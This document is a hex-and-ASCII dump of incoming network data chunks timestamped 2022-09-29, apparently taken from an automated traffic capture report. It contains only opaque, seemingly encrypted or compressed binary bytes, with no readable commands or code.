                                                                                                                                                            2022-09-29 12:44:54 UTC1375INData Raw: 5e 13 f6 81 64 c6 48 2e d7 97 72 a9 c5 f4 28 9f 52 29 10 c1 77 86 98 1b 6a 54 eb 36 0d a0 58 96 d5 f1 d1 63 db fa bc 60 f7 8c b8 ba 68 b4 a0 63 e8 74 81 bb e5 a2 2c e9 ee 45 25 df 16 b2 c0 b2 58 4f 78 ae 05 92 a5 32 f3 bf 77 18 5d 9a e3 b9 0f fc 67 c8 a6 85 80 4d ae 66 7e 06 80 9d ce 27 7b 96 06 04 da 52 99 67 2f be 42 0f 97 1a 01 eb 58 a6 ba af c4 8f 88 51 a1 27 98 f7 8f 25 2f 95 01 64 df 3b 4e ca 66 85 85 ff e6 ca d2 20 d7 00 80 0b 9e fc de da 2a ca 17 87 f0 ac ab f3 66 55 c1 1e 79 dd 7c be 9b 1a 3b 36 f9 f9 c6 46 df 29 fc 47 43 b6 85 2b 49 86 79 9e 11 c8 c3 4e 26 47 a8 73 9d 2b 6a ed 70 fc 16 d0 5d 2f fc 7e b3 82 e2 2a a3 0f 15 7a 8f 19 5d db 74 55 29 b5 1e f0 7b c4 7a 09 8b 80 f3 ef ca fd 02 6d 3d 97 f7 bb 19 a6 64 74 f6 15 f2 9e 77 a0 eb d5 c1 03 bf
                                                                                                                                                            Data Ascii: ^dH.r(R)wjT6Xc`hct,E%XOx2w]gMf~'{Rg/BXQ'%/d;Nf *fUy|;6F)GC+IyN&Gs+jp]/~*z]tU){zm=dtw
                                                                                                                                                            2022-09-29 12:44:54 UTC1391INData Raw: d3 71 fc d1 6a 31 03 fd 51 54 99 77 1b 87 0b 76 ba 23 ea ce 14 43 5b 0c 47 ff bb 5e c5 c4 20 1f 46 e5 29 7e fa a1 1b 76 7f bf 8f b7 c9 54 b5 9e f7 ea 74 81 3b e0 00 3f 29 5b 06 f5 8f c6 12 50 46 93 88 4e a9 06 db 0b 22 82 0c 78 6f a5 1e e6 fe 37 a0 77 a7 d2 ad 42 5a 85 4d 42 a6 aa 0d 43 26 ea e5 93 e2 8c 48 58 56 af be f8 7c af 87 66 c8 66 ec c9 1f b0 ac 48 c4 ef b7 38 41 ba 18 43 ff 0b 42 34 2b 96 5a 13 33 78 7e 17 4e 55 a2 7b d8 17 b6 e2 4a 4e cf 40 1e 35 96 6c 75 ca 6d ae 64 fe 75 5e 37 c6 c9 ac d0 74 a8 5e a7 3b 66 d3 ad d3 0e 3b 11 11 1d 6e 7a 0b bd 03 57 2b a4 20 ee ba 0a c1 ff f2 4e 97 d5 52 35 80 12 15 82 4e 3b 75 8e 4c 3b c3 98 1f 76 03 ef 55 42 a9 b3 d2 62 d7 b0 74 2a 2e fd 48 25 c3 ef 62 eb e7 c8 82 f7 1f ed 75 17 0f d3 ea 88 b6 93 ff 23 60 53
                                                                                                                                                            Data Ascii: qj1QTwv#C[G^ F)~vTt;?)[PFN"xo7wBZMBC&HXV|ffH8ACB4+Z3x~NU{JN@5lumdu^7t^;f;nzW+ NR5N;uL;vUBbt*.H%bu#`S
                                                                                                                                                            2022-09-29 12:44:54 UTC1407INData Raw: 2f f7 c1 fc 94 d6 b7 25 80 dd 8c 3d 40 a9 74 93 d3 6b a3 aa 1a 93 62 13 f8 2d 69 6e a5 ff 60 2b a9 38 9d 90 25 0d 2e ab ca f0 30 7a 5a 3a a9 89 df 40 46 88 39 55 21 4e e7 d3 f3 26 26 2c ff d3 3b 55 37 ef 2b 7f ac e9 5d d3 7d 5b f4 77 54 1f 18 0b 75 13 fd 92 e5 da 25 81 9a 21 8c d6 4f b3 1a bb 65 72 79 e5 6f d7 a7 73 10 5f 2f 0c 17 37 9b d7 7d 6c c2 db f1 6f 7f 94 99 c3 a7 20 eb a1 73 d8 95 d0 b0 7e 57 c0 52 00 2f 16 c4 1b 32 06 1f a0 c9 3b 0e 9d 77 0f cd ae 0c 43 cb 35 b7 19 24 b5 1f 4a bb 0b 84 b6 b5 0c a3 bb a1 15 a1 43 ff f2 05 29 3b ef 7c 33 a5 82 1f d3 a9 ac 36 12 d9 bd c9 44 47 68 d6 84 99 a1 99 f9 5a d4 17 62 ab 80 27 84 bc 6e d8 0a 82 ce f5 1c 0a 6b e1 32 ca 09 81 f9 fe 94 a4 25 cd 01 49 41 96 90 88 51 22 bc 4c af ac 84 54 f1 c0 23 f7 93 76 ae c3
                                                                                                                                                            Data Ascii: /%=@tkb-in`+8%.0zZ:@F9U!N&&,;U7+]}[wTu%!Oeryos_/7}lo s~WR/2;wC5$JC);|36DGhZb'nk2%IAQ"LT#v
                                                                                                                                                            2022-09-29 12:44:54 UTC1423INData Raw: b3 06 4c f5 e5 1c 64 f3 82 27 c0 6e ea 89 72 ee 2e 6b 41 75 ed 38 ba fc e8 fa 78 fe da d1 44 eb 1e 98 50 5c 27 ce f4 88 55 6e 68 28 01 65 d1 ce c8 82 57 86 fa bc 3b a5 52 d7 2d a1 46 62 dd 45 6a 1a 96 07 ec c3 47 fb 27 79 7a 43 3a 01 ea a5 88 70 db 24 97 bf f0 ea e9 33 f1 bb 9c a3 01 ee 5d d9 6b 27 e7 74 f4 f0 00 4e dd de eb 2b 70 09 4f ca 4b fd 30 14 2a 47 50 5d 78 dc b5 36 b1 db c3 6e 03 42 f2 95 93 fa d2 d0 b5 16 54 80 83 c1 40 eb 8a f8 31 31 8c b1 60 42 37 2a b5 60 14 e7 ef ea 14 3f 26 b0 a4 87 8f 74 9c 5a d0 cb 2a 44 fb b6 aa 5a 9a 3f b1 c1 37 db b0 0d 2a 49 42 55 fb 06 a8 cf 37 4b e2 73 cf 6b c9 dc b2 a7 77 69 ee d6 31 9a 4a c4 e0 58 8c d6 d4 73 a5 c5 2e 8b 48 8b 62 ff b8 15 50 11 7e 2c 50 8a 06 61 06 17 7b d9 50 6c df 3f 59 70 de c9 48 c7 8f 48 44
                                                                                                                                                            Data Ascii: Ld'nr.kAu8xDP\'Unh(eW;R-FbEjG'yzC:p$3]k'tN+pOK0*GP]x6nBT@11`B7*`?&tZ*DZ?7*IBU7Kskwi1JXs.HbP~,Pa{Pl?YpHHD
                                                                                                                                                            2022-09-29 12:44:54 UTC1439INData Raw: c8 cb 1b b9 92 36 01 ea d0 20 83 28 5a 2c 07 0b b5 dc e0 0c 1c 5b 0e 43 02 5e fc 8b ee 47 48 6b 4c 13 8e 75 df 17 f4 46 08 c6 fa 35 a9 dc 14 57 a0 6f 0b 70 70 1c 0d fa 6f f5 1a f3 c7 2e 95 0c d8 26 ed e4 74 e5 3b ed 58 0a 68 d9 5c 51 41 88 9a b2 5c 47 b4 9b de 53 d6 7b 59 90 08 0e 41 14 1e 6a 51 b8 f3 d4 71 f2 0e 82 de ed 25 af 96 ad 8b 2d 8f 2b 5d 28 2b 44 e7 e5 e1 8e 7c b5 b2 76 4c 75 98 24 0a d3 b1 95 bf d6 9f ad 2c af 8d bb f3 e8 5a d3 36 6b d0 30 f1 ab 94 5f 03 ec 06 50 d5 c5 16 4c b0 c2 80 60 62 93 b5 b9 3a c7 91 e2 96 99 6b 7e 05 74 cc 74 78 ed 17 4f 96 29 9c 09 ea bf 37 33 6a 48 5b a9 f5 0e 92 d0 47 62 73 2f 22 26 b1 cd 55 94 f4 b9 90 c8 86 67 07 4d cd aa e7 b3 a0 78 c7 70 02 dc b9 ee 33 a7 3d 05 6c ce 6e 55 f0 a5 5c 8d 6d 07 26 b6 86 2b 3b 8c 90
                                                                                                                                                            Data Ascii: 6 (Z,[C^GHkLuF5Woppo.&t;Xh\QA\GS{YAjQq%-+](+D|vLu$,Z6k0_PL`b:k~ttxO)73jH[Gbs/"&UgMxp3=lnU\m&+;
                                                                                                                                                            2022-09-29 12:44:54 UTC1455INData Raw: 04 d2 c6 19 0a 60 a9 fb ad 6f d1 95 73 cb d0 df 53 b8 dc 9a 3f ab 90 7f cd 93 1b da e7 44 06 25 ee 78 d4 19 05 bb 67 a7 a8 79 42 89 6e 50 0a 74 27 4e ed 2a 73 64 ec 32 29 4a c4 f4 aa 86 c5 4f 1a 13 a4 f4 fa b4 87 10 0a ac be 3c 62 0b 1b 7e 59 86 65 aa ba 09 bb 41 73 c8 ed c4 87 81 59 37 67 27 66 bd b7 a8 e8 67 ee 5a 98 36 94 de f1 33 fb 58 3b f6 5e ef c2 0a 9c 0a e3 ee 24 eb 6b ad c3 a5 2f 63 da 75 e1 e0 92 15 61 76 a4 5e 55 21 75 eb 6c f7 f5 43 ca d6 37 7e 95 fe 5a 7d 48 5b 7f b6 05 18 e9 79 ff a7 3b 0f 4f 85 21 8b 59 20 1b 24 22 2c c3 df 11 33 bb 46 c4 c0 8d 03 67 34 34 be a4 3a a6 a9 9f 2e f2 24 45 ca 9a f5 fa 80 cc 16 2e e3 7b 44 56 0a f2 00 bd cb c7 8a 85 a5 dc f0 bd 3b 61 ef ac fb 66 73 26 a2 a4 56 71 94 1e f4 73 09 ab 6b 74 20 3c fd d9 1e f3 fc 1f
                                                                                                                                                            Data Ascii: `osS?D%xgyBnPt'N*sd2)JO<b~YeAsY7g'fgZ63X;^$k/cuav^U!ulC7~Z}H[y;O!Y $",3Fg44:.$E.{DV;afs&Vqskt <
                                                                                                                                                            2022-09-29 12:44:54 UTC1471INData Raw: cb d5 1a 09 8e fc 2a 6a 33 fd 77 ba 31 86 2a d6 c5 49 44 f9 32 25 3a e6 25 6f 12 a3 ca 08 98 df 83 1b c9 f9 02 34 b2 f8 c6 d4 27 28 59 9c ca 06 7f e6 94 1b 33 89 d6 7f a9 db 86 78 01 12 67 50 c4 62 84 04 73 33 c7 80 55 a8 0b a3 59 a6 34 3b 0a 35 2c 4a 36 ce 00 b7 84 b1 c4 2c 77 72 d7 14 20 25 7a 6f af 07 8d b7 df 7a 89 29 1e aa ed 37 bc b2 53 a2 c3 35 08 59 88 ee f7 21 8e 7f fa 3a 54 ab 8a ca c3 12 8d 9b ed 8b dc 66 59 55 07 42 c1 78 aa 9f ee f6 d6 9c 7a f6 76 3d bf 39 bd 8a 61 fe 2e 02 04 4e 97 13 17 66 ba e4 1d c7 f9 59 16 57 b7 69 67 f4 e7 59 96 c6 8d d4 cb 02 11 c0 22 5e bb 47 24 82 66 10 32 a0 f2 1a 1f db 2d f7 2d d5 66 87 08 69 eb 4b 01 0a 5e 20 22 d4 04 23 b8 ca cd 6c b3 f8 6f 09 46 82 41 b8 eb 29 b5 9c 83 b6 1e 32 3a c0 5f b4 cb 4d 27 1e a8 03 73
                                                                                                                                                            Data Ascii: *j3w1*ID2%:%o4'(Y3xgPbs3UY4;5,J6,wr %zoz)7S5Y!:TfYUBxzv=9a.NfYWigY"^G$f2--fiK^ "#loFA)2:_M's
                                                                                                                                                            2022-09-29 12:44:54 UTC1487INData Raw: 40 a5 74 d3 87 33 2c b6 f5 0d 34 f8 26 8a ee 84 ad f3 38 4f ce 76 65 45 bf 1a 00 12 b4 79 c1 58 4e 5d 76 fa 28 7a 27 fe ed 20 43 eb 72 bf 95 74 de 11 0d 0e 1c e7 f1 96 9a 17 24 a9 a4 db 95 69 11 cb 92 ac 04 0a 28 c6 a6 a1 48 87 de aa 13 fd fd 2d c8 4c 34 91 4f 09 df d6 c7 f2 2c 4d ce 57 9a 0d 5c 17 1b 64 d5 1e 26 92 a4 ca d4 c7 e0 0c c5 c5 8f f8 92 3a a1 88 26 25 3c be ff e2 18 f5 fd d4 34 51 6d 2a e6 22 7d bc 12 76 31 06 54 73 0d 6e 86 c3 1d a3 fe fb 6f 3e a9 d1 c5 00 44 96 03 db be 40 eb 4d 4a fe 56 27 33 9b 2c 05 b7 69 09 b4 ee bf 90 1f ee e5 8e 79 7b 1d 22 58 5d b3 04 52 7a 79 8f e2 fb 23 0d b1 83 e0 2e 37 c2 aa 2a c3 62 c3 7d d9 67 f4 cd 7e 42 ad 4d 79 35 2e b3 ed f4 6e 01 c7 2a 23 1a 6e f5 7f f8 d6 c4 66 3b 71 7d b2 b5 42 92 0c b3 8f 30 63 84 a0 a8
                                                                                                                                                            Data Ascii: @t3,4&8OveEyXN]v(z' Crt$i(H-L4O,MW\d&:&%<4Qm*"}v1Tsno>D@MJV'3,iy{"X]Rzy#.7*b}g~BMy5.n*#nf;q}B0c
                                                                                                                                                            2022-09-29 12:44:54 UTC1503INData Raw: 1a 6a 4e 66 b7 4f 25 dc bb 3a 66 53 cd ee d4 a3 b8 ff 93 a5 84 aa a7 ea 28 58 7a f0 0b 56 4c d9 fc 40 6c 6e a5 1a 9c 9e f8 66 e5 24 62 b7 63 dc db 89 d4 48 f1 22 c6 10 c7 fb 60 e0 1e cc 98 89 dd ea 34 aa 0c 88 e2 19 28 77 85 e4 4f 1f 9d 11 f0 66 70 5c 5d ec d4 89 94 7b 5f e5 b0 58 82 a1 01 c0 cb 8c 2d aa f1 c9 19 24 32 5a 93 d3 48 25 e4 6c 61 2f 4a e1 a0 d3 7d 28 64 eb bf eb 78 81 fa 22 11 70 46 02 78 a4 2d df ba 5e cd 85 60 84 43 1b 6e 0a f4 6f 04 5d c9 f6 23 84 18 fb 04 ab 19 b2 12 81 4e 17 3d ca d9 62 f6 7a 25 52 4c 09 33 c3 4b 63 90 90 75 6d 83 4d 80 4f b3 99 10 41 93 b7 38 b8 5e e1 4e 48 d8 9c 40 ae 5e a6 af 0b 0b a4 d2 66 0b d5 d8 97 bc dc 10 5d a8 bb 6a 4c 36 62 22 48 f4 e0 c4 bf 9a 54 4e 81 40 6c 1a d5 7b 66 0d ef 73 30 7c 16 ad 0e 7b 5c 25 13 ba
                                                                                                                                                            Data Ascii: jNfO%:fS(XzVL@lnf$bcH"`4(wOfp\]{_X-$2ZH%la/J}(dx"pFx-^`Cno]#N=bz%RL3KcumMOA8^NH@^f]jL6b"HTN@l{fs0|{\%
                                                                                                                                                            2022-09-29 12:44:54 UTC1519INData Raw: da 9c 99 2e 42 a9 85 fd ff fe eb 5a e5 e9 bb 8b 12 d8 28 e8 28 59 55 31 10 0f a4 fe 99 70 fc 5f 92 17 cf 2a 82 56 e8 92 da 85 22 62 fd be 05 7f 89 0b cb 1b 80 79 da 09 77 6a c4 80 46 c3 78 46 b2 75 3d ec 0f de 63 74 ea 61 cb 9f 00 0b 3b c0 f7 eb ee 98 d6 8d fd d8 6a a8 12 20 62 85 65 ad c1 83 3d e1 21 73 db f5 4e 6f f2 48 35 7c 49 e3 62 bf c1 ff 2d 15 72 c4 9e 0e 4d 26 ba 1e d7 73 35 a8 ed 40 71 f3 2a 60 84 21 7c bd ef ec f0 b7 60 6a 7d 8e a1 95 06 08 54 d3 cf 31 ad d0 5e a2 1b 60 fd 85 93 62 05 e4 d2 80 8b 02 7c 11 05 7a fa d4 85 cb 37 69 cf 4e 21 2b 06 06 86 a2 22 07 e0 6e b5 5e af 1b 18 09 96 15 e2 bf ea 69 b3 1a ce 02 58 46 58 9e f5 b1 4e df 4c 22 c8 18 0d 84 27 9f ef ca 83 33 9f fd 98 59 8f fd d5 7e c7 1d e0 9c b2 5b 19 b6 4a bc e7 d6 67 51 c4 7b cd
                                                                                                                                                            Data Ascii: .BZ((YU1p_*V"bywjFxFu=cta;j be=!sNoH5|Ib-rM&s5@q*`!|`j}T1^`b|z7iN!+"n^iXFXNL"'3Y~[JgQ{
                                                                                                                                                            2022-09-29 12:44:54 UTC1535INData Raw: ba 7c 5d bc 8b c2 bc f4 f8 bd 27 db 99 55 1f 12 1b 57 d4 cc 92 56 6b 9e aa 91 31 0c 99 9c 80 7d 6b e9 17 61 e3 23 02 5c e0 7e be 11 e5 e2 aa 81 d7 06 e4 e5 11 05 86 e8 c7 0f 8a e6 82 53 cc 5a e0 0b ee c5 bd 79 db 7b 80 b8 d1 1c 4c 16 bf f6 5f c5 6f 6e f7 e0 99 11 53 42 3b 72 99 a0 32 f2 52 62 a1 f9 d8 35 76 fd 18 09 c9 61 f8 31 96 4a 30 1c 73 34 9a 9d c1 e0 a9 82 79 6f 9a c5 44 8f 21 f9 a6 bb d2 b0 82 c7 64 7d e9 26 6d 45 af 96 a3 06 1c c2 26 b3 8f af 5e 11 cb 62 1c f6 2e 90 ce cd be 1e 6b 06 34 22 b9 21 51 5f 4b dd e5 0b 38 9b 29 73 a3 42 de 77 a1 27 aa 47 45 66 b8 b2 b1 a9 29 dd c4 f5 db 35 48 01 84 48 6e d1 8c ab 61 81 9d 10 d2 94 95 ba 0f 08 cd e0 82 b1 a4 74 ad 0e 19 bb 67 cc fc 75 98 2e fe 5a b2 c6 cd f7 f4 8d 27 b1 fe 5e b1 a1 4c 2c fb 20 4d 57 e0
                                                                                                                                                            Data Ascii: |]'UWVk1}ka#\~SZy{L_onSB;r2Rb5va1J0s4yoD!d}&mE&^b.k4"!Q_K8)sBw'GEf)5HHnatgu.Z'^L, MW
                                                                                                                                                            2022-09-29 12:44:54 UTC1551INData Raw: 08 ab df 93 5b 6b 32 92 cf d9 42 65 fa 5e 16 50 40 b7 1b 63 b1 be d3 d3 53 6f 25 00 2c 0c 2c 91 d8 4a 21 38 df d7 27 1a a5 3e 91 a4 3c e5 ef 9d 2a c1 aa 5a ce 22 e6 05 6a 08 ca ee 67 c0 75 e3 8b 23 2e c1 e6 dd bc da 35 d3 93 c2 62 ef 45 11 b1 e0 8a fa 2f 4a ca cc 80 30 c6 df 69 d3 1d 76 4e 99 05 82 45 a6 cc fb 52 cf bd f4 56 b0 40 15 71 96 41 59 c7 a9 bf 8f e5 4f 62 dc 0f 6a 3d 22 55 04 ad 04 ad a3 ff f5 a1 e6 f7 63 86 9f 05 a5 bd bd 71 37 db 6b f1 83 89 27 22 52 13 c8 36 02 46 a2 01 b9 38 b6 78 c2 6c 7f 87 f5 f4 18 ca 6e 2f 98 2e 8a d0 b8 1c 03 06 92 1f b1 a7 42 00 cf 9f 9a 1d 27 63 ac 73 1d d8 10 49 83 8a 4d a5 84 64 b8 0f d2 7c fd ce 64 d9 8c de 76 df 97 18 3a b9 1c e6 58 98 39 46 9d 2e d9 eb 71 40 23 8a 1d 04 e9 79 6c 48 26 74 69 ba c8 5b ed 58 28 1d
                                                                                                                                                            Data Ascii: [k2Be^P@cSo%,,J!8'><*Z"jgu#.5bE/J0ivNERV@qAYObj="Ucq7k'"R6F8xln/.B'csIMd|dv:X9F.q@#ylH&ti[X(
                                                                                                                                                            2022-09-29 12:44:54 UTC1567INData Raw: 57 61 cf 88 c6 bd 8e 42 fd dd 45 27 6e 1a 0f 0f 79 d6 ea 71 6c fb 7a 2f 5f 61 d3 19 2c bf a7 78 30 15 22 64 19 77 c8 81 a2 5c bc 57 06 a1 63 fb 6d 47 05 11 ca ed 0d aa e4 8c 22 ba ee 8a 90 fa 95 4f a8 44 5f 1f 61 1a 99 26 cc ab 12 ef 49 90 f3 be 0c e7 5b a6 19 90 da 07 77 14 3a 5a 4b 9a ab 8b 08 9d b2 35 92 19 74 7a ce 3f 05 0d 50 1d 3b 7d c3 b0 8f df d4 d5 76 f8 5b b6 b3 6f 58 02 81 a2 b7 e8 ae 53 99 f2 51 4d 01 b4 17 6f 78 ef a6 ea f6 a4 55 be 64 4f 23 6d 9d 71 ba 19 39 ca e4 31 6a 99 63 d1 3d 48 c2 db c0 67 0c e8 57 50 bf 0d 2e 24 22 d1 c0 69 01 cc 72 62 30 36 31 eb 1c eb 61 bc df 83 09 20 b9 55 02 16 ab 7c 81 56 1b 8d 3e cb a8 89 2d f2 78 32 4f d3 c3 23 8c 9e 32 52 ee fd 43 4c 45 23 60 80 16 18 71 d6 25 4c 3d ff 2a 66 46 78 dc 93 0e 34 41 06 17 01 14
                                                                                                                                                            Data Ascii: WaBE'nyqlz/_a,x0"dw\WcmG"OD_a&I[w:ZK5tz?P;}v[oXSQMoxUdO#mq91jc=HgWP.$"irb061a U|V>-x2O#2RCLE#`q%L=*fFx4A
                                                                                                                                                            2022-09-29 12:44:54 UTC1583INData Raw: 80 0e e7 1c e7 30 fb 34 8d d1 da 69 cf 55 43 74 58 b0 c5 40 40 43 ea a9 cd 73 0d 1b 75 61 92 fe fc e5 c2 1f 7a 52 63 38 d0 9c 5c 69 d8 8a a2 fd 22 e8 6a d5 20 7b 4e d8 bc 8c ce 4f 8a 9a c0 c4 5f f0 21 79 7f 08 0d b5 a3 87 85 2e 63 3e 83 dc 8b 63 f3 10 d3 60 b9 7c 11 ca 51 c0 67 9e 51 5a 26 44 10 9d 4c 0e d9 97 64 3d 42 64 ad aa 36 0b 2d 59 d0 a0 fb 77 ca c2 06 00 85 d7 0b 28 61 2f 89 75 6b 38 d7 39 e0 cc 19 43 4c e8 aa 99 87 a5 75 09 ba af 84 e5 44 5f f9 e9 e5 19 bb 46 00 f5 b1 0d 28 06 a7 15 31 87 66 38 66 0e ab 0d 02 8d 9e bc a5 73 09 80 62 2b 88 f8 96 92 d1 aa b1 47 38 47 28 da 3a 7f 8b 8a b5 df 87 11 03 ae e6 73 44 a2 7d 52 e2 58 1a 7a 6f e7 29 82 b9 d8 e5 85 e4 ec 1a 90 70 53 55 6a 32 05 0c da 04 78 12 46 74 c7 5a 7b 74 70 7d 25 9a f2 fe ad a3 bd dc
                                                                                                                                                            Data Ascii: 04iUCtX@@CsuazRc8\i"j {NO_!y.c>c`|QgQZ&DLd=Bd6-Yw(a/uk89CLuD_F(1f8fsb+G8G(:sD}RXzo)pSUj2xFtZ{tp}%
                                                                                                                                                            2022-09-29 12:44:54 UTC1599INData Raw: 16 b4 4d 20 c8 52 76 6d 2f 5b e8 eb f3 86 83 d4 af 29 93 1a cc 82 8b 14 80 14 5c ef 9d 9c 58 fa 15 70 3c 78 36 71 a7 07 47 65 55 7c 78 67 e0 b0 9d f4 29 47 c0 79 9f 4d 41 cf 98 d5 12 ef 4b 19 4d 6b 2b fe 3b 26 00 98 8a 04 9c 36 0d fb 1b a2 6f 92 79 52 4c 91 dd a6 22 1c 95 2f d8 8d 61 6f de 2d 89 22 ee 0d 2a 9a e4 de b2 5b f5 fd 93 18 33 34 c6 41 30 79 b1 44 e7 26 a3 e6 00 3c af ee e6 af 33 21 25 4d 29 76 47 bf 02 24 e9 98 f3 ca 90 82 1a 2b a2 7c 1e 10 31 ab 4b 89 59 b3 3d b1 ee 66 bf 22 ed 33 08 22 64 7a 52 26 5d 33 57 04 c1 52 5c b8 21 88 fb ae e0 07 0f 0f 59 0e 87 4e b0 84 5a 4f 21 9c 72 99 a2 a6 dd 77 e8 21 0e 96 f7 e0 dc c1 93 4d ae 45 33 f5 c5 62 0e d4 22 7d 51 93 06 74 b2 90 11 5e a6 8f 48 cd 8e 76 8f 1c 82 8d 54 7d a8 9c 2e 55 47 03 fc 3d 4c a0 03
                                                                                                                                                            Data Ascii: M Rvm/[)\Xp<x6qGeU|xg)GyMAKMk+;&6oyRL"/ao-"*[34A0yD&<3!%M)vG$+|1KY=f"3"dzR&]3WR\!YNZO!rw!ME3b"}Qt^HvT}.UG=L
                                                                                                                                                            2022-09-29 12:44:54 UTC1615INData Raw: 6d ff d8 b0 ba f9 a7 1e a2 79 4d 85 47 6d 74 fc ff c1 25 39 cd 3f 2d 13 04 0c 18 e0 e2 85 3a 8f ac fc 04 ce 31 3c 5f 6c e2 61 a7 69 b2 41 d2 e6 69 e8 52 b6 5e 06 b5 a8 3d 3d 5c 2e ad 16 26 dc 34 ca ed 35 0e 2e d5 a8 34 a7 15 c8 5e e3 d7 2a 87 d4 60 bf ae 1f b3 1e b4 5a bd 4b 24 fb 83 11 98 75 91 46 ba 1b 25 ab bd b9 6b b0 71 58 54 59 51 b8 65 4c 42 1c 8c 00 5b ef eb 36 1c a9 0d e8 65 ef 21 d5 b9 4c 55 90 9f 00 6d 57 12 40 f2 d7 a2 14 a0 0a ab 9c 5e 82 0d 9b ca cd 8f 3e b8 fe 12 9c 27 86 8c 5a e2 33 62 6a 9d 30 67 8b 50 e5 0e 33 e4 da ef 0d e9 73 58 59 cd 68 d3 a7 96 33 8e bc 9d 87 98 fa f3 e7 cd 38 1a f8 44 c6 b4 55 33 e5 b5 b0 e9 ca 8e f0 e5 01 f9 96 50 30 41 3e bd f9 22 8d ca 62 e9 fb db 41 f4 4f 39 d6 25 17 89 11 db 12 47 84 da e8 91 8d 57 e4 ac 15 f1
                                                                                                                                                            Data Ascii: myMGmt%9?-:1<_laiAiR^==\.&45.4^*`ZK$uF%kqXTYQeLB[6e!LUmW@^>'Z3bj0gP3sXYh38DU3P0A>"bAO9%GW
                                                                                                                                                            2022-09-29 12:44:54 UTC1631INData Raw: 69 0e ad e7 c1 76 8f d4 b8 83 00 76 fd fc 74 99 63 f4 b1 b9 71 73 d8 2e ac 63 99 9d 5f 6a 30 5b 45 66 b9 dd e8 1e 04 14 6b a2 22 8f b6 ac ef ee 58 4b fd 48 7c 88 21 73 42 96 46 a1 e8 0d f5 36 b8 72 58 a3 3b 09 e3 8b 06 02 c6 24 93 6d 5e 3d 97 0c 68 f4 ee ac 29 3a 52 67 09 d4 3e 17 e8 c5 bd 60 db 5d ae da ba 2b 9f 22 8b 8c 2d e5 0e 7c 19 81 bd 6a c4 60 d2 0b 35 94 10 de 25 c5 6c 0b 12 15 d5 0d a4 a9 83 12 12 d2 2f 12 43 bf c7 6b a2 ad 5f 17 e2 ff 34 2c 3e 3f c1 ef f8 19 51 eb a8 88 b9 fb 0d 33 cf 1f 90 c3 0e f9 4a d8 2b 46 23 71 1e c9 a2 c7 e0 80 07 ac 29 35 0b 85 59 eb 46 f1 71 ff 54 4e 98 16 5b e6 76 9f 50 19 16 dc 67 a8 50 98 6f 42 35 a3 50 73 ec c8 2c 20 af 12 e3 b8 49 2b 34 c8 13 3d ad 49 9f 3c 95 42 d2 da 4c ae 7b fb a1 b4 8e 96 d8 42 b0 31 82 68 b5
                                                                                                                                                            Data Ascii: ivvtcqs.c_j0[Efk"XKH|!sBF6rX;$m^=h):Rg>`]+"-|j`5%l/Ck_4,>?Q3J+F#q)5YFqTN[vPgPoB5Ps, I+4=I<BL{B1h
                                                                                                                                                            2022-09-29 12:44:54 UTC1647INData Raw: 66 44 99 d5 cc 94 3c cb 37 e1 55 f1 c1 71 db 38 30 86 99 90 75 07 da 85 d5 27 7d b9 5a e8 0a 55 2c ed 56 03 3c c5 fa 09 49 ad b0 e3 a5 fd 90 77 4c f7 0f f8 95 08 de e9 60 52 24 f8 a9 bc b6 c5 3e d2 e1 f6 f1 e5 1e 85 3d fb 93 15 4f 9f 9d 44 e7 30 87 0b ea 48 21 06 ad b6 b4 01 d0 cb 5b b0 ed 33 68 a3 60 88 33 c5 78 10 e8 e9 61 e4 06 ac 0f 87 56 0c 8b 8f 06 c6 78 91 3d 8c cb 8c 52 8b c9 dd 09 ab 12 6a b7 31 8c d9 02 95 16 d8 ee 18 c5 fc dc 9e f5 c9 a4 34 7d da 89 ac 8b 35 12 4f 07 fa ec 6f 6f f1 49 34 41 37 bf 91 a5 e3 01 cc 8c c7 a8 fc 79 ec 4f 49 35 1c 1e ab 88 20 6d 25 35 42 a7 2d 4f de 01 3a a8 2f dd 81 81 60 e6 e8 31 cf d3 52 7e 33 6c c2 74 42 af af 20 65 d7 86 52 e4 10 9a af c4 15 40 fe 32 dd df ef 05 f0 1f 76 e5 e0 06 65 91 bd 92 4c 1c 4b 28 18 2e 7b
                                                                                                                                                            Data Ascii: fD<7Uq80u'}ZU,V<IwL`R$>=OD0H![3h`3xaVx=Rj14}5OooI4A7yOI5 m%5B-O:/`1R~3ltB eR@2veLK(.{
                                                                                                                                                            2022-09-29 12:44:54 UTC1663INData Raw: db 2e 41 be 56 9b 42 d5 40 35 30 a0 1a 55 29 12 dd 6b ed f5 3c f1 07 7b ae 52 c4 99 23 c5 4d 35 75 bf 7c 7b 82 b9 59 02 ba c2 81 70 96 2a 94 22 e8 09 26 1d 31 a1 f5 6f b6 00 15 71 00 6c 10 af 78 8d 72 6b fe 4c 73 4b b5 32 fa a5 20 02 aa 15 f9 4d a4 f5 fa 8d e3 b8 4d ca 79 97 04 9e f6 71 22 94 6f c8 56 ee b6 ee 12 51 2c 27 81 f2 c8 b1 73 24 77 a7 63 a0 af 09 0a e6 e7 0a d2 02 aa bb 8e 28 ce 83 aa 51 16 44 b3 d9 a5 89 41 ca ae 7c 91 83 00 ba 98 fd 46 d5 fb a3 83 bb 09 02 19 1d a7 07 33 35 87 32 77 2e 69 a8 ab ef 98 8b b6 00 16 39 1f 20 6c 11 b3 aa 11 e1 ff 23 a9 02 6b e6 ca 00 37 65 1b 56 ad 39 26 5a eb a3 18 b2 01 ae 25 88 9a 2d 77 af 82 ef 48 92 2a 53 2e 7c c7 6d e4 63 b6 7e 29 52 e1 42 19 c3 16 e5 44 a2 b4 23 f9 9b 0b 28 64 2f 46 5d 87 2b 5c 49 24 fe 06
                                                                                                                                                            Data Ascii: .AVB@50U)k<{R#M5u|{Yp*"&1oqlxrkLsK2 MMyq"oVQ,'s$wc(QDA|F352w.i9 l#k7eV9&Z%-wH*S.|mc~)RBD#(d/F]+\I$
